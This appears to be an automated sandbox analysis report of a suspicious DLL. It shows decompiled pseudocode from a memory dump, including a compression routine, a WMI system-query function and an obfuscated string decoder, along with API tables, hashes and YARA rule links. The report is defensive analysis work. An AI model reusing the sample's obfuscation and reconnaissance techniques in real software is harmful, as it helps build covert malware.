										_t67 = _t223 + 0x14; // 0xc703f045
										_t68 = _t223 + 8; // 0x8d000040
										_t69 = _t223 + 0x16b9; // 0x89fffffe
										 *((char*)( *_t67 +  *_t68)) =  *_t69;
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										_t75 = _t223 + 0x16bc; // 0x8b3c7e89
										_t373 = _v28 >> 0x00000010 & 0x0000ffff;
										_t308 =  *_t75 + 0xfffffff0 + _t396;
									}
									_t388 = _v24;
									 *(_t223 + 0x16bc) = _t308;
									 *(_t223 + 0x16b8) = _t373;
								}
								_t80 = _t223 + 0xabc; // 0x5d0674c0
								_t358 =  *_t80 & 0x0000ffff;
								_t81 = _t223 + 0x16bc; // 0x8b3c7e89
								_t402 =  *_t81;
								_t82 = _t223 + 0xabe; // 0x4e95d06
								_t245 =  *_t82 & 0x0000ffff;
								_v24 = _t358;
								_t84 = _t223 + 0x16b8; // 0xfffffe8b
								_t361 = (_t358 << _t402 |  *_t84) & 0x0000ffff;
								_v28 = _t361;
								if(_t402 > 0x10 - _t245) {
									_t86 = _t223 + 0x14; // 0xc703f045
									 *(_t223 + 0x16b8) = _t361;
									_t88 = _t223 + 8; // 0x8d000040
									 *((char*)( *_t88 +  *_t86)) = _v28;
									_t223 = _a4;
									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
									_t94 = _t223 + 0x14; // 0xc703f045
									_t95 = _t223 + 8; // 0x8d000040
									_t96 = _t223 + 0x16b9; // 0x89fffffe
									 *((char*)( *_t94 +  *_t95)) =  *_t96;
									_t100 = _t223 + 0x16bc; // 0x8b3c7e89
									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
									_t361 = _v24 >> 0x10;
									_t402 =  *_t100 + 0xfffffff0;
								}
								_t403 = _t402 + _t245;
								_t362 = _t361 & 0x0000ffff;
								 *(_t223 + 0x16bc) = _t403;
								 *(_t223 + 0x16b8) = _t362;
								_t363 = _t362 & 0x0000ffff;
								if(_t403 <= 0xe) {
									_t121 = _t403 + 2; // 0x8b3c7e8b
									_t275 = _t121;
									goto L28;
								} else {
									_t394 = _t388 + 0xfffffffd;
									_t105 = _t223 + 0x14; // 0xc703f045
									_t248 = _t394 << _t403 | _t363;
									_t106 = _t223 + 8; // 0x8d000040
									 *(_t223 + 0x16b8) = _t248;
									 *( *_t106 +  *_t105) = _t248;
									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
									_t111 = _t223 + 0x14; // 0xc703f045
									_t112 = _t223 + 8; // 0x8d000040
									_t113 = _t223 + 0x16b9; // 0x89fffffe
									 *((char*)( *_t111 +  *_t112)) =  *_t113;
									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
									 *(_t223 + 0x16bc) =  *(_t223 + 0x16bc) + 0xfffffff2;
									 *(_t223 + 0x16b8) = _t394 >> 0x00000010 & 0x0000ffff;
									goto L35;
								}
							} else {
								_t316 = _t223 + (_t235 + 0x29f) * 4;
								_v28 = _t316;
								do {
									_t378 = _a12;
									_t22 = _t223 + 0x16bc; // 0x8b3c7e89
									_t409 =  *_t22;
									_t24 = _t378 * 4; // 0x238830a
									_t250 =  *(_t223 + _t24 + 0xa7e) & 0x0000ffff;
									_t379 =  *_t316 & 0x0000ffff;
									_v24 = _t379;
									_t27 = _t223 + 0x16b8; // 0xfffffe8b
									_t382 = (_t379 << _t409 |  *_t27) & 0x0000ffff;
									_v20 = _t382;
									if(_t409 <= 0x10 - _t250) {
										_t321 = _t409 + _t250;
									} else {
										_t29 = _t223 + 0x14; // 0xc703f045
										 *(_t223 + 0x16b8) = _t382;
										_t31 = _t223 + 8; // 0x8d000040
										 *((char*)( *_t31 +  *_t29)) = _v20;
										_t223 = _a4;
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										_t37 = _t223 + 0x14; // 0xc703f045
										_t38 = _t223 + 8; // 0x8d000040
										_t39 = _t223 + 0x16b9; // 0x89fffffe
										 *((char*)( *_t37 +  *_t38)) =  *_t39;
										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
										_t382 = _v24 >> 0x10;
										_t45 = _t223 + 0x16bc; // 0x8b3c7e89
										_t321 =  *_t45 + 0xfffffff0 + _t250;
									}
									 *(_t223 + 0x16bc) = _t321;
									_t316 = _v28;
									 *(_t223 + 0x16b8) = _t382 & 0x0000ffff;
									_t388 = _t388 - 1;
								} while (_t388 != 0);
								L35:
								_t235 = _v8;
								_t388 = 0;
								_t398 = _a12;
								if(_t235 != 0) {
									if(_a8 != _t235) {
										_t329 = 7;
										_t217 = _t329 - 3; // 0x4
										_t254 = _t217;
									} else {
										_t329 = 6;
										_t216 = _t329 - 3; // 0x3
										_t254 = _t216;
									}
								} else {
									_t329 = 0x8a;
									_t214 = _t388 + 3; // 0x3
									_t254 = _t214;
								}
								goto L41;
							}
						}
						_t223 = _a4;
						if(_t235 == _v8) {
							_t235 = _v8;
							goto L41;
						}
						goto L4;
						L41:
						_v12 =  &(_v12[2]);
						_t221 =  &_v16;
						 *_t221 = _v16 - 1;
					} while ( *_t221 != 0);
					goto L42;
				}
			}

0x10016eb3
0x10016eba
0x10016ebe
0x10016ec0
0x10016ec2
0x10016ec8
0x100173b5
0x100173bb
0x10016ece
0x10016eda
0x10016ee7
0x10016eea
0x10016ef1
0x10016ef4
0x10016ef7
0x10016efa
0x10016efb
0x10016efe
0x10016f04
0x10016f07
0x10016f0c
0x10016f1c
0x10016f1e
0x10016fd4
0x10017163
0x10017163
0x1001716c
0x1001727f
0x1001727f
0x10017286
0x10017286
0x1001728f
0x1001729c
0x100172a5
0x100172a8
0x100172ad
0x100172f5
0x100172af
0x100172af
0x100172b2
0x100172b9
0x100172bf
0x100172c2
0x100172c5
0x100172c8
0x100172cb
0x100172ce
0x100172d4
0x100172e2
0x100172e5
0x100172e8
0x100172f1
0x100172f1
0x100172f8
0x100172fb
0x10017301
0x10017308
0x1001730e
0x1001735c
0x10017368
0x1001736f
0x10017310
0x10017310
0x10017313
0x1001731c
0x1001731f
0x10017322
0x10017329
0x1001732c
0x1001732f
0x10017332
0x10017335
0x1001733b
0x10017346
0x1001734c
0x10017353
0x10017353
0x00000000
0x1001730e
0x10017172
0x10017172
0x10017179
0x10017179
0x10017182
0x1001718f
0x10017198
0x1001719b
0x100171a0
0x100171a2
0x100171a5
0x100171ac
0x100171b2
0x100171b5
0x100171b8
0x100171bb
0x100171be
0x100171c1
0x100171c7
0x100171d5
0x100171db
0x100171de
0x100171e1
0x100171e1
0x100171e4
0x100171e6
0x100171e9
0x100171ef
0x100171f6
0x100171fc
0x10017255
0x10017255
0x10017258
0x10017258
0x1001725e
0x10017266
0x10017273
0x100171fe
0x100171fe
0x10017209
0x1001720c
0x1001720f
0x10017212
0x10017219
0x1001721c
0x1001721f
0x10017222
0x10017225
0x1001722b
0x10017237
0x1001723c
0x10017249
0x10017249
0x00000000
0x100171fc
0x10016fda
0x10016fdf
0x10016fe5
0x10016fe5
0x10016fed
0x10016fed
0x10016ff5
0x10016ff5
0x10016ffd
0x1001700a
0x10017013
0x10017018
0x1001705d
0x1001705f
0x1001701a
0x1001701a
0x1001701d
0x10017020
0x10017027
0x1001702a
0x1001702d
0x10017030
0x10017033
0x10017039
0x10017047
0x1001704d
0x10017056
0x10017059
0x10017059
0x10017062
0x10017065
0x1001706b
0x1001706b
0x10017072
0x10017072
0x10017079
0x10017079
0x10017081
0x10017081
0x10017088
0x10017095
0x1001709e
0x100170a1
0x100170a6
0x100170a8
0x100170ab
0x100170b2
0x100170b8
0x100170bb
0x100170be
0x100170c1
0x100170c4
0x100170c7
0x100170cd
0x100170db
0x100170e1
0x100170e4
0x100170e7
0x100170e7
0x100170ea
0x100170ec
0x100170ef
0x100170f5
0x100170fc
0x10017102
0x1001715b
0x1001715b
0x00000000
0x10017104
0x10017104
0x1001710f
0x10017112
0x10017115
0x10017118
0x1001711f
0x10017122
0x10017125
0x10017128
0x1001712b
0x10017131
0x1001713d
0x10017142
0x1001714f
0x00000000
0x1001714f
0x10016f24
0x10016f2a
0x10016f2d
0x10016f30
0x10016f30
0x10016f33
0x10016f33
0x10016f39
0x10016f39
0x10016f41
0x10016f46
0x10016f53
0x10016f5c
0x10016f5f
0x10016f64
0x10016fac
0x10016f66
0x10016f66
0x10016f69
0x10016f70
0x10016f76
0x10016f79
0x10016f7c
0x10016f7f
0x10016f82
0x10016f85
0x10016f8b
0x10016f99
0x10016f9c
0x10016f9f
0x10016fa8
0x10016fa8
0x10016fb2
0x10016fb8
0x10016fbb
0x10016fc2
0x10016fc2
0x10017375
0x10017375
0x10017378
0x1001737a
0x1001737f
0x1001738e
0x1001739a
0x1001739f
0x1001739f
0x10017390
0x10017390
0x10017395
0x10017395
0x10017395
0x10017381
0x10017381
0x10017386
0x10017386
0x10017386
0x00000000
0x1001737f
0x10016f1e
0x10016f13
0x10016f16
0x100173a4
0x00000000
0x100173a4
0x00000000
0x100173a7
0x100173a7
0x100173ab
0x100173ab
0x100173ab
0x00000000
0x10016ef4

Memory Dump Source

Source File: 00000006.00000002.618638056.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.618621006.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0050a3338128a3e29d0738b8ec7b1954f4e7d535beab72997c1b6becb188d890
Instruction ID: 0c3308942ac57208bd8606007510a2814f56dadb0132f9c471c079d8b51e24d2
Opcode Fuzzy Hash: 0050a3338128a3e29d0738b8ec7b1954f4e7d535beab72997c1b6becb188d890
Instruction Fuzzy Hash: EEF16D755092518FC709CF18C4D48FA7BF1FFA9310B1A82F9D8999B3A6D731A980CB91

Uniqueness

Uniqueness Score: -1.00%

Function 10014FC0, Relevance: .2, Instructions: 190COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.618638056.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.618621006.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5067ce0d69c97c32a38e7aeb3fef6c0114ffe29ce053d50af88417ef7cc46d5
Instruction ID: e10ac18f6a2dc82c047ac3a6231bc634579b0427d93bb8cac9548a9b95137502
Opcode Fuzzy Hash: e5067ce0d69c97c32a38e7aeb3fef6c0114ffe29ce053d50af88417ef7cc46d5
Instruction Fuzzy Hash: 817135356201758FE704CF2ADCD05BA33A1E78E34138AC629FA46CF395C535E626CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 10011758, Relevance: .2, Instructions: 169COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.618638056.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.618621006.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3fd2de03972cb3b7321cea2e293ceee1f2e46d12c6b89ea3bcf7c4ef0d5e13cb
Instruction ID: 8b2308eb0caa98c5fc40748196c6a291e313b8726404b2d010a505a218b38381
Opcode Fuzzy Hash: 3fd2de03972cb3b7321cea2e293ceee1f2e46d12c6b89ea3bcf7c4ef0d5e13cb
Instruction Fuzzy Hash: 175157B3B041B00BDF588E3D8C642757ED35AC515270EC2BAF9A9CB24AE978C7059760

Uniqueness

Uniqueness Score: -1.00%

Function 10012346, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.618638056.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.618621006.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8030d81dc236fa19504743191c490e51e4050de0e9408ade4ea3357c27d2e4ca
Instruction ID: 1f3934e2420efc180bb9c0cbc4fac13afaf5f650056083a87c6d8f741bd90931
Opcode Fuzzy Hash: 8030d81dc236fa19504743191c490e51e4050de0e9408ade4ea3357c27d2e4ca
Instruction Fuzzy Hash: 6E2192766150128BD35CDF2CD8A2A69F3A5FB48310F45427ED42BCB682CB71E492CB80

Uniqueness

Uniqueness Score: -1.00%

Function 1000DB3C, Relevance: 24.9, APIs: 12, Strings: 2, Instructions: 388
memoryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E1000DB3C(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				void* _v28;
				signed int _v32;
				char _v36;
				intOrPtr _v40;
				signed int _v44;
				char _v48;
				char _v52;
				intOrPtr _v56;
				signed int _v60;
				char* _v72;
				signed short _v80;
				signed int _v84;
				char _v88;
				char _v92;
				char _v96;
				intOrPtr _v100;
				char _v104;
				char _v616;
				intOrPtr* _t159;
				char _t165;
				signed int _t166;
				signed int _t173;
				signed int _t178;
				signed int _t186;
				intOrPtr* _t187;
				signed int _t188;
				signed int _t192;
				intOrPtr* _t193;
				intOrPtr _t200;
				intOrPtr* _t205;
				signed int _t207;
				signed int _t209;
				intOrPtr* _t210;
				intOrPtr _t212;
				intOrPtr* _t213;
				signed int _t214;
				char _t217;
				signed int _t218;
				signed int _t219;
				signed int _t230;
				signed int _t235;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				intOrPtr* _t247;
				intOrPtr* _t251;
				signed int _t252;
				intOrPtr* _t253;
				void* _t255;
				intOrPtr* _t261;
				signed int _t262;
				signed int _t283;
				signed int _t289;
				char* _t298;
				void* _t320;
				signed int _t322;
				intOrPtr* _t323;
				intOrPtr _t324;
				signed int _t327;
				intOrPtr* _t328;
				intOrPtr* _t329;

				_v32 = _v32 & 0x00000000;
				_v60 = _v60 & 0x00000000;
				_v56 = __edx;
				_v100 = __ecx;
				_t159 = E1000D523(__ecx);
				_t251 = _t159;
				_v104 = _t251;
				if(_t251 == 0) {
					return _t159;
				}
				_t320 = E10008604(0x10);
				_v36 = _t320;
				_pop(_t255);
				if(_t320 == 0) {
					L53:
					E1000861A( &_v60, 0xfffffffe);
					E1000D5D7( &_v104);
					return _t320;
				}
				_t165 = E100095E1(_t255, 0x536);
				 *_t328 = 0x609;
				_v52 = _t165;
				_t166 = E100095E1(_t255);
				_push(0);
				_push(_v56);
				_v20 = _t166;
				_push(_t166);
				_push(_a4);
				_t322 = E100092E5(_t165);
				_v60 = _t322;
				E100085D5( &_v52);
				E100085D5( &_v20);
				_t329 = _t328 + 0x20;
				if(_t322 != 0) {
					_t323 = __imp__#2;
					_v40 =  *_t323(_t322);
					_t173 = E100095E1(_t255, 0x9e4);
					_v20 = _t173;
					_v52 =  *_t323(_t173);
					E100085D5( &_v20);
					_t324 = _v40;
					_t261 =  *_t251;
					_t252 = 0;
					_t178 =  *((intOrPtr*)( *_t261 + 0x50))(_t261, _v52, _t324, 0, 0,  &_v32);
					__eflags = _t178;
					if(_t178 != 0) {
						L52:
						__imp__#6(_t324);
						__imp__#6(_v52);
						goto L53;
					}
					_t262 = _v32;
					_v28 = 0;
					_v20 = 0;
					__eflags = _t262;
					if(_t262 == 0) {
						L49:
						 *((intOrPtr*)( *_t262 + 8))(_t262);
						__eflags = _t252;
						if(_t252 == 0) {
							E1000861A( &_v36, 0);
							_t320 = _v36;
						} else {
							 *(_t320 + 8) = _t252;
							 *_t320 = E100091E3(_v100);
							 *((intOrPtr*)(_t320 + 4)) = E100091E3(_v56);
						}
						goto L52;
					} else {
						goto L6;
					}
					while(1) {
						L6:
						_t186 =  *((intOrPtr*)( *_t262 + 0x10))(_t262, 0xea60, 1,  &_v28,  &_v84);
						__eflags = _t186;
						if(_t186 != 0) {
							break;
						}
						_v16 = 0;
						_v48 = 0;
						_v12 = 0;
						_v24 = 0;
						__eflags = _v84;
						if(_v84 == 0) {
							break;
						}
						_t187 = _v28;
						_t188 =  *((intOrPtr*)( *_t187 + 0x1c))(_t187, 0, 0x40, 0,  &_v24);
						__eflags = _t188;
						if(_t188 >= 0) {
							__imp__#20(_v24, 1,  &_v16);
							__imp__#19(_v24, 1,  &_v48);
							_t46 = _t320 + 0xc; // 0xc
							_t253 = _t46;
							_t327 = _t252 << 3;
							_t47 = _t327 + 8; // 0x8
							_t192 = E10008698(_t327, _t47);
							__eflags = _t192;
							if(_t192 == 0) {
								__imp__#16(_v24);
								_t193 = _v28;
								 *((intOrPtr*)( *_t193 + 8))(_t193);
								L46:
								_t252 = _v20;
								break;
							}
							 *(_t327 +  *_t253) = _v48 - _v16 + 1;
							 *((intOrPtr*)(_t327 +  *_t253 + 4)) = E10008604( *(_t327 +  *_t253) << 3);
							_t200 =  *_t253;
							__eflags =  *(_t327 + _t200 + 4);
							if( *(_t327 + _t200 + 4) == 0) {
								_t136 = _t320 + 0xc; // 0xc
								E1000861A(_t136, 0);
								E1000861A( &_v36, 0);
								__imp__#16(_v24);
								_t205 = _v28;
								 *((intOrPtr*)( *_t205 + 8))(_t205);
								_t320 = _v36;
								goto L46;
							}
							_t207 = _v16;
							while(1) {
								_v12 = _t207;
								__eflags = _t207 - _v48;
								if(_t207 > _v48) {
									break;
								}
								_v44 = _v44 & 0x00000000;
								_t209 =  &_v12;
								__imp__#25(_v24, _t209,  &_v44);
								__eflags = _t209;
								if(_t209 < 0) {
									break;
								}
								_t212 = E100091E3(_v44);
								 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + (_v12 - _v16) * 8)) = _t212;
								_t213 = _v28;
								_t281 =  *_t213;
								_t214 =  *((intOrPtr*)( *_t213 + 0x10))(_t213, _v44, 0,  &_v80, 0, 0);
								__eflags = _t214;
								if(_t214 < 0) {
									L39:
									__imp__#6(_v44);
									_t207 = _v12 + 1;
									__eflags = _t207;
									continue;
								}
								_v92 = E100095E1(_t281, 0x250);
								 *_t329 = 0x4cc;
								_t217 = E100095E1(_t281);
								_t283 = _v80;
								_v96 = _t217;
								_t218 = _t283 & 0x0000ffff;
								__eflags = _t218 - 0xb;
								if(__eflags > 0) {
									_t219 = _t218 - 0x10;
									__eflags = _t219;
									if(_t219 == 0) {
										L35:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E10008604(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											L38:
											E100085D5( &_v92);
											E100085D5( &_v96);
											__imp__#9( &_v80);
											goto L39;
										}
										_push(_v72);
										_push(L"%d");
										L37:
										_push(0xc);
										_push(_t289);
										E10009640();
										_t329 = _t329 + 0x10;
										goto L38;
									}
									_t230 = _t219 - 1;
									__eflags = _t230;
									if(_t230 == 0) {
										L33:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E10008604(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											goto L38;
										}
										_push(_v72);
										_push(L"%u");
										goto L37;
									}
									_t235 = _t230 - 1;
									__eflags = _t235;
									if(_t235 == 0) {
										goto L33;
									}
									__eflags = _t235 == 1;
									if(_t235 == 1) {
										goto L33;
									}
									L28:
									__eflags = _t283 & 0x00002000;
									if((_t283 & 0x00002000) == 0) {
										_v88 = E100095E1(_t283, 0x219);
										E10009640( &_v616, 0x100, _t237, _v80 & 0x0000ffff);
										E100085D5( &_v88);
										_t329 = _t329 + 0x18;
										_t298 =  &_v616;
										L31:
										_t242 = E100091E3(_t298);
										L32:
										 *( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8) = _t242;
										goto L38;
									}
									_t242 = E1000DA20( &_v80);
									goto L32;
								}
								if(__eflags == 0) {
									__eflags = _v72 - 0xffff;
									_t298 = L"TRUE";
									if(_v72 != 0xffff) {
										_t298 = L"FALSE";
									}
									goto L31;
								}
								_t243 = _t218 - 1;
								__eflags = _t243;
								if(_t243 == 0) {
									goto L38;
								}
								_t244 = _t243 - 1;
								__eflags = _t244;
								if(_t244 == 0) {
									goto L35;
								}
								_t245 = _t244 - 1;
								__eflags = _t245;
								if(_t245 == 0) {
									goto L35;
								}
								__eflags = _t245 != 5;
								if(_t245 != 5) {
									goto L28;
								}
								_t298 = _v72;
								goto L31;
							}
							__imp__#16(_v24);
							_t210 = _v28;
							 *((intOrPtr*)( *_t210 + 8))(_t210);
							_t252 = _v20;
							L42:
							_t262 = _v32;
							_t252 = _t252 + 1;
							_v20 = _t252;
							__eflags = _t262;
							if(_t262 != 0) {
								continue;
							}
							L48:
							_t324 = _v40;
							goto L49;
						}
						_t247 = _v28;
						 *((intOrPtr*)( *_t247 + 8))(_t247);
						goto L42;
					}
					_t262 = _v32;
					goto L48;
				} else {
					E1000861A( &_v36, _t322);
					_t320 = _v36;
					goto L53;
				}
			}

0x1000db45
0x1000db4b
0x1000db52
0x1000db55
0x1000db58
0x1000db5d
0x1000db5f
0x1000db64
0x1000dfac
0x1000dfac
0x1000db71
0x1000db73
0x1000db76
0x1000db79
0x1000df91
0x1000df97
0x1000dfa1
0x00000000
0x1000dfa6
0x1000db84
0x1000db8b
0x1000db92
0x1000db95
0x1000db9a
0x1000db9c
0x1000db9f
0x1000dba2
0x1000dba3
0x1000dbac
0x1000dbb2
0x1000dbb5
0x1000dbbe
0x1000dbc3
0x1000dbc8
0x1000dbdf
0x1000dbec
0x1000dbef
0x1000dbf6
0x1000dbfb
0x1000dc02
0x1000dc07
0x1000dc0e
0x1000dc10
0x1000dc1c
0x1000dc1f
0x1000dc21
0x1000df81
0x1000df82
0x1000df8b
0x00000000
0x1000df8b
0x1000dc27
0x1000dc2a
0x1000dc2d
0x1000dc30
0x1000dc32
0x1000df4d
0x1000df50
0x1000df53
0x1000df55
0x1000df77
0x1000df7c
0x1000df57
0x1000df5a
0x1000df65
0x1000df6c
0x1000df6c
0x00000000
0x00000000
0x00000000
0x00000000
0x1000dc38
0x1000dc38
0x1000dc4a
0x1000dc4d
0x1000dc4f
0x00000000
0x00000000
0x1000dc57
0x1000dc5a
0x1000dc5d
0x1000dc60
0x1000dc63
0x1000dc66
0x00000000
0x00000000
0x1000dc6c
0x1000dc7a
0x1000dc7d
0x1000dc7f
0x1000dc98
0x1000dca7
0x1000dcaf
0x1000dcaf
0x1000dcb2
0x1000dcb9
0x1000dcbd
0x1000dcc3
0x1000dcc5
0x1000df35
0x1000df3b
0x1000df41
0x1000df44
0x1000df44
0x00000000
0x1000df44
0x1000dcd4
0x1000dce8
0x1000dcec
0x1000dcee
0x1000dcf3
0x1000df02
0x1000df08
0x1000df13
0x1000df1e
0x1000df24
0x1000df2a
0x1000df2d
0x00000000
0x1000df2d
0x1000dcf9
0x1000ded0
0x1000ded0
0x1000ded3
0x1000ded6
0x00000000
0x00000000
0x1000dd01
0x1000dd09
0x1000dd10
0x1000dd16
0x1000dd18
0x00000000
0x00000000
0x1000dd21
0x1000dd36
0x1000dd3c
0x1000dd45
0x1000dd48
0x1000dd4b
0x1000dd4d
0x1000dec3
0x1000dec6
0x1000decf
0x1000decf
0x00000000
0x1000decf
0x1000dd5d
0x1000dd60
0x1000dd67
0x1000dd6d
0x1000dd70
0x1000dd73
0x1000dd76
0x1000dd79
0x1000ddb5
0x1000ddb5
0x1000ddb8
0x1000de64
0x1000de78
0x1000de88
0x1000de8c
0x1000de8e
0x1000dea5
0x1000dea9
0x1000deb2
0x1000debd
0x00000000
0x1000debd
0x1000de94
0x1000de95
0x1000de9a
0x1000de9a
0x1000de9c
0x1000de9d
0x1000dea2
0x00000000
0x1000dea2
0x1000ddbe
0x1000ddbe
0x1000ddc1
0x1000de2c
0x1000de40
0x1000de50
0x1000de54
0x1000de56
0x00000000
0x00000000
0x1000de5c
0x1000de5d
0x00000000
0x1000de5d
0x1000ddc3
0x1000ddc3
0x1000ddc6
0x00000000
0x00000000
0x1000ddc8
0x1000ddcb
0x00000000
0x00000000
0x1000ddcd
0x1000ddcd
0x1000ddd3
0x1000ddef
0x1000ddfe
0x1000de07
0x1000de0c
0x1000de0f
0x1000de15
0x1000de15
0x1000de1a
0x1000de26
0x00000000
0x1000de26
0x1000ddd8
0x00000000
0x1000ddd8
0x1000dd7b
0x1000dda2
0x1000dda7
0x1000ddac
0x1000ddae
0x1000ddae
0x00000000
0x1000ddac
0x1000dd7d
0x1000dd7d
0x1000dd80
0x00000000
0x00000000
0x1000dd86
0x1000dd86
0x1000dd89
0x00000000
0x00000000
0x1000dd8f
0x1000dd8f
0x1000dd92
0x00000000
0x00000000
0x1000dd98
0x1000dd9b
0x00000000
0x00000000
0x1000dd9d
0x00000000
0x1000dd9d
0x1000dedf
0x1000dee5
0x1000deeb
0x1000deee
0x1000def1
0x1000def1
0x1000def4
0x1000def5
0x1000def8
0x1000defa
0x00000000
0x00000000
0x1000df4a
0x1000df4a
0x00000000
0x1000df4a
0x1000dc81
0x1000dc87
0x00000000
0x1000dc87
0x1000df47
0x00000000
0x1000dbca
0x1000dbcf
0x1000dbd4
0x00000000
0x1000dbd8

APIs

Part of subcall function 1000D523: CoInitializeEx.OLE32(00000000,00000000), ref: 1000D536
Part of subcall function 1000D523: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 1000D547
Part of subcall function 1000D523: CoCreateInstance.OLE32(1001B848,00000000,00000001,1001B858,?), ref: 1000D55E
Part of subcall function 1000D523: SysAllocString.OLEAUT32(00000000), ref: 1000D569
Part of subcall function 1000D523: CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 1000D594

Part of subcall function 10008604: HeapAlloc.KERNEL32(00000008,?,?,10008F84,00000100,?,10005FCB), ref: 10008612

SysAllocString.OLEAUT32(00000000), ref: 1000DBE5
SysAllocString.OLEAUT32(00000000), ref: 1000DBF9
SysFreeString.OLEAUT32(?), ref: 1000DF82
SysFreeString.OLEAUT32(?), ref: 1000DF8B

Part of subcall function 1000861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 10008660

Strings

TRUE, xrefs: 1000DDA7
FALSE, xrefs: 1000DDAE

Memory Dump Source

Source File: 00000006.00000002.618638056.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.618621006.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: String$Alloc$Free$HeapInitialize$BlanketCreateInstanceProxySecurity
String ID: FALSE$TRUE
API String ID: 224402418-1412513891
Opcode ID: 95ff9ab5d061d96dc60c0cf74fe266a414f7d2914be56b1a19689f674a06e878
Instruction ID: 5411e9e7cadc0f68074cac65ab41d21575f1dfdd33ecf7b2672d11ac1b24c815
Opcode Fuzzy Hash: 95ff9ab5d061d96dc60c0cf74fe266a414f7d2914be56b1a19689f674a06e878
Instruction Fuzzy Hash: 13E16375D002199FEB15EFE4C885EEEBBB9FF48380F10415AF505AB259DB31AA01CB60

Uniqueness

Uniqueness Score: -1.00%

Function 1000E668, Relevance: 15.3, APIs: 9, Strings: 1, Instructions: 305
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E1000E668(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr _a24) {
				char _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				char _v64;
				int _v76;
				void* _v80;
				intOrPtr _v100;
				int _v104;
				void* _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				char* _v120;
				void _v124;
				char _v140;
				void _v396;
				void _v652;
				intOrPtr _t105;
				intOrPtr _t113;
				intOrPtr* _t115;
				intOrPtr _t118;
				intOrPtr _t121;
				intOrPtr _t124;
				intOrPtr _t127;
				intOrPtr _t131;
				char _t133;
				intOrPtr _t136;
				char _t138;
				char _t139;
				intOrPtr _t141;
				intOrPtr _t147;
				intOrPtr _t154;
				intOrPtr _t158;
				intOrPtr _t162;
				intOrPtr _t164;
				intOrPtr _t166;
				intOrPtr _t172;
				intOrPtr _t176;
				void* _t183;
				void* _t185;
				intOrPtr _t186;
				char _t195;
				intOrPtr _t203;
				intOrPtr _t204;
				signed int _t209;
				void _t212;
				intOrPtr _t213;
				void* _t214;
				intOrPtr _t216;
				char _t217;
				intOrPtr _t218;
				signed int _t219;
				signed int _t220;
				void* _t221;

				_v40 = _v40 & 0x00000000;
				_v24 = 4;
				_v36 = 1;
				_t214 = __edx;
				memset( &_v396, 0, 0x100);
				memset( &_v652, 0, 0x100);
				_v64 = E100095C7(0x85b);
				_v60 = E100095C7(0xdc9);
				_v56 = E100095C7(0x65d);
				_v52 = E100095C7(0xdd3);
				_t105 = E100095C7(0xb74);
				_v44 = _v44 & 0;
				_t212 = 0x3c;
				_v48 = _t105;
				memset( &_v124, 0, 0x100);
				_v116 = 0x10;
				_v120 =  &_v140;
				_v124 = _t212;
				_v108 =  &_v396;
				_v104 = 0x100;
				_v80 =  &_v652;
				_push( &_v124);
				_push(0);
				_v76 = 0x100;
				_push(E1000C379(_t214));
				_t113 =  *0x1001e6a4; // 0x0
